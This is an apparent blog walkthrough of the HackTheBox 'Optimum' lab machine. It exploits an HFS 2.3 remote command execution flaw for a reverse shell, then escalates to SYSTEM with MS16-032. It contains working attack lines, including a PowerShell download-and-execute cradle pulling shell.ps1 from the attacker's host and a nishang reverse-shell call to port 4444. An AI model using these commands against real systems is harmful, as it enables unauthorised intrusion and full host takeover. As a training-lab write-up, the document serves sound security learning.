hackthebox optimum walkthrough

Starting with nmap

# nmap -sT -sC -sV 10.10.10.8 -oA optimum
Starting Nmap 7.70 ( https://nmap.org ) at 2019-07-17 10:02 EDT
Nmap scan report for 10.10.10.8
Host is up (0.17s latency).
Not shown: 999 filtered ports
PORT   STATE SERVICE VERSION
80/tcp open  http    HttpFileServer httpd 2.3
|_http-server-header: HFS 2.3
|_http-title: HFS /
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 25.70 seconds

Port 80 is HFS, If we try to login then we will get an unauthorized error. Following is the screenshot.

hackthebox – optimum – unauthorized

Using searchploit to find if there is any vulnerabilities related to HFS

# searchsploit HFS | grep Remote
FHFS - FTP/HTTP File Server 2.1.2 Remote Command Execution                                              | exploits/windows/remote/37985.py
Rejetto HTTP File Server (HFS) - Remote Command Execution (Metasploit)                                  | exploits/windows/remote/34926.rb
Rejetto HTTP File Server (HFS) 2.3.x - Remote Command Execution (1)                                     | exploits/windows/remote/34668.txt
Rejetto HTTP File Server (HFS) 2.3.x - Remote Command Execution (2)                                     | exploits/windows/remote/39161.py
Rejetto HTTP File Server (HFS) 2.3a/2.3b/2.3c - Remote Command Execution                                | exploits/windows/webapps/34852.txt

Cloning one with Remote Command Execution

# searchsploit -m exploits/windows/remote/39161.py

There are two things we should do before running above python script. First is to change the IP address and port, second is to copy the nc.exe to the current directory and start python HTTP server

# cp /usr/share/windows-binaries/nc.exe ./
# python -m SimpleHTTPServer 80

Then run the script

# python 39161.py 10.10.10.8 80

We will get shell

# nc -lvnp 443
listening on [any] 443 ...
connect to [10.10.14.44] from (UNKNOWN) [10.10.10.8] 49162
Microsoft Windows [Version 6.3.9600]
(c) 2013 Microsoft Corporation. All rights reserved.

C:\Users\kostas\Desktop>whoami
whoami
optimum\kostas

To get the priv esac we can gather some information using systeminfo command

C:\>systeminfo
systeminfo

Host Name:                 OPTIMUM
OS Name:                   Microsoft Windows Server 2012 R2 Standard
OS Version:                6.3.9600 N/A Build 9600
OS Manufacturer:           Microsoft Corporation
OS Configuration:          Standalone Server
OS Build Type:             Multiprocessor Free
Registered Owner:          Windows User
Registered Organization:   
Product ID:                00252-70000-00000-AA535
Original Install Date:     18/3/2017, 1:51:36 ��
System Boot Time:          24/7/2019, 1:50:34 ��
System Manufacturer:       VMware, Inc.
System Model:              VMware Virtual Platform
System Type:               x64-based PC
Processor(s):              1 Processor(s) Installed.
                           [01]: AMD64 Family 23 Model 1 Stepping 2 AuthenticAMD ~2000 Mhz
BIOS Version:              Phoenix Technologies LTD 6.00, 12/12/2018
Windows Directory:         C:\Windows
System Directory:          C:\Windows\system32
Boot Device:               \Device\HarddiskVolume1
System Locale:             el;Greek
Input Locale:              en-us;English (United States)
Time Zone:                 (UTC+02:00) Athens, Bucharest
Total Physical Memory:     4.095 MB
Available Physical Memory: 3.476 MB
Virtual Memory: Max Size:  5.503 MB
Virtual Memory: Available: 4.928 MB
Virtual Memory: In Use:    575 MB
Page File Location(s):     C:\pagefile.sys
Domain:                    HTB
Logon Server:              \\OPTIMUM
Hotfix(s):                 31 Hotfix(s) Installed.
                           [01]: KB2959936
                           [02]: KB2896496
                           [03]: KB2919355
                           [04]: KB2920189
                           [05]: KB2928120
                           [06]: KB2931358
                           [07]: KB2931366
                           [08]: KB2933826
                           [09]: KB2938772
                           [10]: KB2949621
                           [11]: KB2954879
                           [12]: KB2958262
                           [13]: KB2958263
                           [14]: KB2961072
                           [15]: KB2965500
                           [16]: KB2966407
                           [17]: KB2967917
                           [18]: KB2971203
                           [19]: KB2971850
                           [20]: KB2973351
                           [21]: KB2973448
                           [22]: KB2975061
                           [23]: KB2976627
                           [24]: KB2977629
                           [25]: KB2981580
                           [26]: KB2987107
                           [27]: KB2989647
                           [28]: KB2998527
                           [29]: KB3000850
                           [30]: KB3003057
                           [31]: KB3014442
Network Card(s):           1 NIC(s) Installed.
                           [01]: Intel(R) 82574L Gigabit Network Connection
                                 Connection Name: Ethernet0
                                 DHCP Enabled:    No
                                 IP address(es)
                                 [01]: 10.10.10.8
Hyper-V Requirements:      A hypervisor has been detected. Features required for Hyper-V will not be displayed.

We can save the file and run it against windows exploit suggestor.

# ./windows-exploit-suggester.py --database 2019-07-17-mssb.xls  --systeminfo sysinfo.txt 

After this, we will see a few suggestions. Among them I like MS16-032

We will PowerShell here. For this, we need to first clone Empire and nishang Github repo.

Copy Invoke-MS16032.ps1 from Empire…

# cp /opt/Empire/data/module_source/privesc/Invoke-MS16032.ps1 ./Invoke-MS16032.ps1

…and paste following at the end of the file

Invoke-MS16032 -Command "iex(New-Object Net.WebClient).DownloadString('http://10.10.14.44/shell.ps1')"

As you can see, above line will call shell.ps1, therefore copy Invoke-PowerShellTcp.ps1 and rename to shell.ps1

# cp /opt/nishang/Shells/Invoke-PowerShellTcp.ps1 ./shell.ps1

append following at the end of the file

Invoke-PowerShellTcp -Reverse -IPAddress 10.10.14.44 -Port 4444

We will serve these files using the previous python HTTP server. Put these files in the same folder from where we had run the python HTTP server.

Now from previous shell download file Invoke-MS16032.ps1, I have to use wget.vbs here.

C:\Users\kostas\Desktop>cd %temp%
C:\Users\kostas\AppData\Local\Temp> cscript wget.vbs http://10.10.14.44/Invoke-MS16032.ps1 Invoke-MS16032.ps1

Listen 4444 port for shell

# nc -lvnp 4444

It is necessary to have 64-bit Powershell otherwise if you use only PowerShell command then 32-bit will be loaded and you will not get the shell back as “nt authority”. To use 64-bit Powershell, use the full path. Just to be clear if you are using 32-bit PowerShell then you will get an error as follows:

[!] No valid thread handles were captured, exiting!

Let’s continue

C:\Users\kostas\AppData\Local\Temp>C:\windows\sysnative\windowspowershell\v1.0\powershell "C:\Users\kostas\AppData\Local\Temp\Invoke-MS16032.ps1"
     __ __ ___ ___   ___     ___ ___ ___ 
    |  V  |  _|_  | |  _|___|   |_  |_  |
    |     |_  |_| |_| . |___| | |_  |  _|
    |_|_|_|___|_____|___|   |___|___|___|
                                        
                   [by b33f -> @FuzzySec]

[!] Holy handle leak Batman, we have a SYSTEM shell!!


C:\Users\kostas\AppData\Local\Temp>

In another window, we got the shell

# nc -lvnp 4444
listening on [any] 4444 ...
connect to [10.10.14.44] from (UNKNOWN) [10.10.10.8] 49190
Windows PowerShell running as user OPTIMUM$ on OPTIMUM
Copyright (C) 2015 Microsoft Corporation. All rights reserved.

PS C:\Users\kostas\AppData\Local\Temp>whoami
nt authority\system

Leave a Reply

Your email address will not be published. Required fields are marked *